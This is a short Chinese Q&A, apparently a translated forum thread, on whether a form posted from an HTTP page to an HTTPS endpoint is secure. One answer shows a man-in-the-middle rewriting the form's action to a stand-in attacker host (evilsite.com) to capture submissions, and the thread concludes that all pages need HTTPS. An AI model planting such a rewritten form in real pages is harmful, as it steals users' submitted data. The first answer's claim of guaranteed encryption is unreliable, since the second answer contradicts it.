说我在网址http://mysite.com/form.html.在查看源代码时,我明白了
<form method="post" action="https://mysite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
如果我点击提交按钮,表单信息会在发送到进程页面/控制器时加密吗?
是 - 表单中的数据将使用SSL实施的常规握手加密发送.从那里,您可以选择将您的用户置于SSL下,或使用会话标识符将其重新发送回标准连接.
无法保证它会被加密,或者提交的数据将会到达您的网站.
由于最初的响应是通过http,一个中间人可以改变你的html源,或者可以插入一些javascript来修改你的表单的action参数.因此,当您的表单到达浏览器时,它可以像这样读取
<form method="post" action="https://evilsite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
这意味着如果您想要安全,必须在所有页面上使用HTTPS.